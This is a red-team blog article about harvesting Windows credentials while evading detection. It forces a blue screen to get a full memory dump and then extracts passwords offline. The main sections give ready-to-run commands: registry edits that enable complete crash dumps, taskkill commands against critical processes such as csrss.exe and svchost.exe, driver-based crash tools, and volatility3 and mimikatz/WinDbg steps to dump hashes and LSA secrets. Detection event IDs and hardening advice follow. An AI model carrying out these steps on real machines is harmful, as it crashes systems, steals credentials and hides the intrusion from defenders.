💀 Windows | Get passwords no one notices 🔑

2024-11-04T19:11:03.732Z

Intro

Local and domain cached credentials, tickets and so on are located on your RAM. But real-time extraction is noisy and can be easily detected.

One of existing solutions is to crash target system to get full memory dump, exfiltrate the file and process it remotely to defense evasion.

💡 Tip:

There are cases when you have to reboot the computer, but some servers and computers restrict system restarts. So BSoD also can help to bypass limitations.

Before we BSoD

0. Check if there is enough disk space to memory dump

Full memory dump occupies as much disk space as RAM stores. If disk space is too low, this technique will not work

1. Make sure complete memory dump enabled

(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled).CrashDumpEnabled -eq 1

1*. Enable if necessary

⚠️ Note:

Admin rights required

GUI (System properties --> Advanced system settings --> Advanced --> Startup and Recovery --> Settings)

cmd.exe

reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f

PowerShell

Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord

Registry Editor (regedit.exe)

2. Make sure MEMORY.DMP file can be created

(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name Overwrite).Overwrite -eq 1

2*. Allow if necessary

⚠️ Note:

Admin rights required

cmd.exe

reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v Overwrite /d 1 /f

PowerShell

Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name Overwrite -Value 1 -Type DWord

Registry Editor (regedit.exe)

3. Make sure pagefile.sys size is enough

For Complete memory dump %SystemDrive%\pagefile.sys must be >= RAM size + 257 MB

How to BSoD

1. Terminate a critical process

Windows 7: csrss.exe
Windows 7, 8: wininit.exe
Windows 10, 11: svchost.exe

Example

taskkill /im csrss.exe /f
taskkill /im wininit.exe /f
taskkill /im svchost.exe /f

⚠️ Note:

Admin rights required

2. Start a critical process

wininit.exe

Example

wininit

⚠️ Note:

This bug was fixed on Windows 11 Admin rights required

3. Start and kill your own critical process

C# implementation: https://github.com/GrumpBoat/ForceBSOD

Example

ForceBSOD.exe

⚠️ Note:

Admin rights required

4. Ask a driver to cause problems

The custom driver can be used to generate BSoD. For example, NotMyFault from Sysinternals package works this way.

Sysinternals implementation: https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault

Supports both GUI and CLI and several ways to crash the system.

Example

notmyfault.exe /crash

⚠️ Note:

Admin rights required

5*. CrashOnCtrlScroll

Set registry values depending on your keyboard. Create REG_DWORD CrashOnCtrlScroll and set 0x1 value under:

PS/2: HKLM\System\CurrentControlSet\Services\i8042prt\Parameters
USB: HKLM\System\CurrentControlSet\Services\kbdhid\Parameters
Hyper-V: HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters

Example

Press and hold the Rightmost Ctrl and then press Scroll Lock twice

⚠️ Warning:

Physical access or VM management console access required!

6*. Raise a NtRaiseHardError

Tools:

🔥 Pros:

No admin needed

❌ Error:

Failed to extract passwords from MEMORY.DMP file which was created using this technique during tests

What else if not RAM?

1. Hiberfil.sys

Path: %SystemDrive%\hiberfil.sys

It stores compressed RAM before the system go to sleep / hibernation state. So you need to decompress it first.

⚠️ Note:

Convert it to .dmp formats with one of these tools:

Hibr2Dmp.exe D:\Dumps\hiberfil.sys D:\Dumps\hiberfil.dmp

volatility2

py vol.py -f D:\Dumps\hiberfil.sys imageinfo
py vol.py -f D:\Dumps\hiberfil.sys imagecopy --profile=<your_profile> -O D:\Dumps\hiberfil.raw
py vol.py -f D:\Dumps\hiberfil.raw --profile=<your_profile> raw2dmp -O D:\Dumps\hiberfil.dmp

*MoonSols Memory Toolkit is no longer officially distributed

2. Virtual Machine snaphot

⚠️ Note:

Convert it to .dmp formats first following the general approach:

Convert a snapshot to a raw file
Convert a raw file to a .dmp file

VmWare has vmss2core (Built-in tool for VmWare Workstation)

vmss2core.exe -W D:\Dumps\snapshot.vmsn D:\Dumps\snapshot.vmem

How to extract credentials

volatility3

py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump

WinDbg + mimilib.dll

Load a crash dump
Load mimilib.dll using commands listed below

.load D:\Tools\mimilib.dll
!process 0 0 lsass.exe
.process /r /p <NUMBER_FROM_PREVIOUS_STEP>
!mimikatz

rekall + mimikatz plugin

Outdated and not recommended to use

🎁 Bonus

RAM also contains a lot of useful information:

browsers' data
password managers' data
registry
all running processes

💡 Tip:

Search for vulnerable services (unquoted service path, for example) or recon software installed

🔵 Detection

1. Security EventID 4688, Sysmon EventID 1, PowerShell/Operational EventID 4104

1.1. Process Command Line

wmic recoveros set WriteToSystemLog = False
wmic recoveros set DebugInfoType = 1
wmic recoveros set DebugFilePath = <path>
wmic recoveros set OverwriteExistingDebugFile = 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
taskkill /im <critical_process_name>
Stop-Process <critical_process_name>

2. Sysmon EventID 13

2.1. Suspicious params of the memory crash dump

Key: HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\

Params:

CrashDumpEnabled = DWORD (0x00000001)
Overwrite = DWORD (0x00000001)
LogEvent = DWORD (0x00000000)
DumpFile != %SystemRoot%\MEMORY.DMP

2.2. NotMyFault

Key: HKLM\SYSTEM\CurrentControlSet\Services\MYFAULT

Params:

ImagePath = \??\C:\Windows\system32\drivers\myfault.sys

2.3. CrashOnCtrlScroll

Key:

HKLM\System\CurrentControlSet\Services\i8042prt\Parameters
HKLM\System\CurrentControlSet\Services\kbdhid\Parameters
HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters

Params:

CrashOnCtrlScroll = DWORD (0x00000001)

3. Security EventID 4697, System EventID 7045

3.1. NotMyFault

Service Name: MYFAULT

Service File Name: %SystemRoot%\system32\drivers\myfault.sys

4. Sysmon EventID 11

4.1. Crash dump creation

File Path: %SystemRoot%\MEMORY.DMP

or just

File Name: MEMORY.DMP

4.2. NotMyFault

File Path: %SystemRoot%\system32\drivers\myfault.sys

5. System EventID 12, 6008, 1001

5.1. EventID 12

Failed to save a crash dump

The crash dump file could not be created due to a lack of free space on the destination drive. Increasing the amount of free space on the destination drive may help prevent this error.

5.2. EventID 6008

The previous system shutdown at HH:mm:ss on ‎DD/‎MM/‎YYYY was unexpected.

5.3. EventID 1001

BSoD has occured

The computer has rebooted from a bugcheck. The bugcheck was: 0x000000ef (0xffffab8ea3c6a080, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: <GUID>.

6. Sysmon EventID 6

6.1. NotMyFault

Every time NotMyFault launches, this Sysmon EventID 6 is generated

ImageLoaded: %SystemRoot%\System32\drivers\myfault.sys

7. Security EventID 4663

Object Name: %SystemRoot%\MEMORY.DMP

Accesses:

ReadAttributes
ReadData (or ListDirectory)

⚠️ Note:

SACL on %SystemRoot%\MEMORY.DMP must be configured

File Access Auditing must be configrued:

auditpol /set /subcategory:"File System" /success:enable

💪🏻 Hardening

1. Turn off hibernation

powercfg /hibernate off

2. Restrict access to crash dumps files

Save crash dumps to folders which can be accessed by special users only (strong DACL)

3. Do not allow full memory dump

Configure GPO to periodically check CrashControl params, log a crash event to Event Log and disable full memory dump

reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v LogEvent /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 0 /f

⚠️ Note:

Crash dumps can help you identify problems with your software, drivers, etc... So, it's not recommended to set CrashDumpEnabled value to 0x0.

You would better use any of these values instead:

0x2 = Kernel memory dump
0x3 = Small memory dump (64 KB)
0x7 = Automatic memory dump

4. Set VM snaphots retention

5. Periodically change passwords

Once a 30-45 days

DefenseEvasion

💀 Windows | Get passwords no one notices 🔑

Intro

In this article

Before we BSoD

0. Check if there is enough disk space to memory dump

1. Make sure complete memory dump enabled

1*. Enable if necessary

2. Make sure MEMORY.DMP file can be created

2*. Allow if necessary

3. Make sure pagefile.sys size is enough

How to BSoD

1. Terminate a critical process

2. Start a critical process

3. Start and kill your own critical process

4. Ask a driver to cause problems

5*. CrashOnCtrlScroll

6*. Raise a NtRaiseHardError

What else if not RAM?

1. Hiberfil.sys

2. Virtual Machine snaphot

How to extract credentials

volatility3

WinDbg + mimilib.dll

rekall + mimikatz plugin

🎁 Bonus

🔵 Detection

1. Security EventID 4688, Sysmon EventID 1, PowerShell/Operational EventID 4104

2. Sysmon EventID 13

3. Security EventID 4697, System EventID 7045

4. Sysmon EventID 11

5. System EventID 12, 6008, 1001

6. Sysmon EventID 6

7. Security EventID 4663

💪🏻 Hardening

1. Turn off hibernation

2. Restrict access to crash dumps files

3. Do not allow full memory dump

4. Set VM snaphots retention

5. Periodically change passwords